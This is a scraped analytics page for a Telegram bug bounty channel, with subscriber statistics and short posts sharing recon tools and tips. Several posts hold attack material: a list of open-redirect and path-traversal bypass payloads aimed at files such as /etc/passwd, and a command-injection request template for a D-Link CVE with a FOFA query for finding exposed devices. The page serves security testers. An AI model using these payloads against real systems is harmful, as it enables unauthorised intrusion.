en
Feedback
Bug Bounty

Bug Bounty

Open in Telegram

Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •

Show more
9 446
Subscribers
No data24 hours
-37 days
-6030 days

Data loading in progress...

Tags Cloud
No data
Any problems? Please refresh the page or contact our support manager.
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
June '25
June '25
+23
in 0 channels
May '25
+31
in 0 channels
Get PRO
April '25
+31
in 0 channels
Get PRO
March '25
+44
in 0 channels
Get PRO
February '25
+31
in 0 channels
Get PRO
January '25
+35
in 0 channels
Get PRO
December '24
+47
in 0 channels
Get PRO
November '24
+479
in 0 channels
Get PRO
October '24
+372
in 0 channels
Get PRO
September '24
+67
in 0 channels
Get PRO
August '24
+352
in 1 channels
Get PRO
July '24
+568
in 0 channels
Get PRO
June '24
+207
in 1 channels
Get PRO
May '24
+356
in 2 channels
Get PRO
April '24
+233
in 1 channels
Get PRO
March '24
+159
in 0 channels
Get PRO
February '24
+142
in 1 channels
Get PRO
January '24
+531
in 0 channels
Get PRO
December '23
+486
in 0 channels
Get PRO
November '23
+126
in 0 channels
Get PRO
October '23
+188
in 0 channels
Get PRO
September '23
+95
in 0 channels
Get PRO
August '23
+184
in 0 channels
Get PRO
July '23
+581
in 0 channels
Get PRO
June '23
+79
in 0 channels
Get PRO
May '23
+239
in 0 channels
Get PRO
April '23
+88
in 0 channels
Get PRO
March '23
+155
in 0 channels
Get PRO
February '23
+665
in 0 channels
Get PRO
January '23
+784
in 0 channels
Get PRO
December '22
+1 254
in 0 channels
Get PRO
November '22
+2 347
in 0 channels
Get PRO
October '22
+565
in 0 channels
Date
Subscriber Growth
Mentions
Channels
21 June+1
20 June+1
19 June0
18 June+2
17 June+1
16 June0
15 June+2
14 June+3
13 June+1
12 June0
11 June0
10 June0
09 June0
08 June+2
07 June+1
06 June+2
05 June0
04 June+2
03 June0
02 June+1
01 June+4
Channel Posts
🚀 Exciting News for #InfoSec & #BugBounty! 🛡 ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥 ✅ Proxy m
🚀 Exciting News for #InfoSec & #BugBounty! 🛡 ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥 ✅ Proxy management ✅ Scope validation ✅ Program tracking ✅ Lightweight & private Open-Source : https://github.com/aacle/ProxSec Feedback welcome! 💬

2
🔖The ultimate 403 Bypass wordlists and tester notes by JHaddix 📱 Github: 🔗 Link
🔖The ultimate 403 Bypass wordlists and tester notes by JHaddix 📱 Github: 🔗 Link
2 077
3
TOP_100_Vulnerabilities_Step_by_Step_Guide_Handbook.pdf
2 656
4
🔖 Dnsbruter - A powerful tool for active subdomain enumeration and discovery. ✨ Features: Dnsbruter uses DNS resolution to b
🔖 Dnsbruter - A powerful tool for active subdomain enumeration and discovery. ✨ Features: Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance. 🔗 https://github.com/RevoltSecurities/Dnsbruter/
2 524
5
bounty_tips_100+.pdf
3 134
6
⚡️Want to download 100+ Bug Bounty Tips collected from X? ✅Download the PDF from here #BugBounty #bugbountytips
2 727
7
⚡️Want to download 100+ Bug Bounty Tips collected from X? ✅Download the PDF from here - https://t.me/brutsecurity/767 #BugBounty #bugbountytips
1
8
bounty_tips_100+.pdf
1
9
Extract all endpoints from a JS File and take your bug 🐞 ✅Method one waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o
Extract all endpoints from a JS File and take your bug 🐞 ✅Method one waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]? 15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\. (get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ] {5,})\"" | awk -F "['|"]" '{print $2}' sort -fu ✅Method two cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt #infosec #cybersec #bugbountytips
3 650
10
🔍 gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches. 🔗https://github.com/gwen001/gitlab-subdoma
🔍 gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches. 🔗https://github.com/gwen001/gitlab-subdomains
3 655
11
https://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b
3 474
12
🔖Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities ✅https://github.com/rootDR/e
🔖Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities ✅https://github.com/rootDR/ex-param
3 875
13
🔖AWS penetration testing: A step-by-step Guide for Beginners ☄️https://www.hackthebox.com/blog/aws-pentesting-guide+1
🔖AWS penetration testing: A step-by-step Guide for Beginners ☄️https://www.hackthebox.com/blog/aws-pentesting-guide
4 115
14
https://github.com/harsh-bothra/learn365/blob/main/days/day5.md
https://github.com/harsh-bothra/learn365/blob/main/days/day5.md
3 434
15
☄️You can try this effective manual openredirect Bypass☄️ 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd
3 353
16
⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate con
⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that. 🔗github.com/s0md3v/uro
2 575
17
cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&amp;name=%27;;%27 FOFA:app =D_Link-DNS-Share
cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27 FOFA:app =D_Link-DNS-ShareCenter #exploit #poc #IoT
3 629
18
⚠️ S3 Bucket Recon ⚠️ Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20
⚠️ S3 Bucket Recon ⚠️ Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
3 453
19
Hey everyone! 🌟 Hope you’re all doing well in your current phase. I’m looking for a skilled React Native developer to join us and help mitigate some ongoing challenges. If you’re interested or know someone who might be a great fit, please reach out to me at @rootxabhishek. Thanks!
4 227
20
https://tagmango.com/web/checkout/671a883165626b7204a59a11 Use the coupon code HACKER30 to unlock a 30% discount, exclusively available for the first 100 customers! Don’t miss out—grab your deal now!
1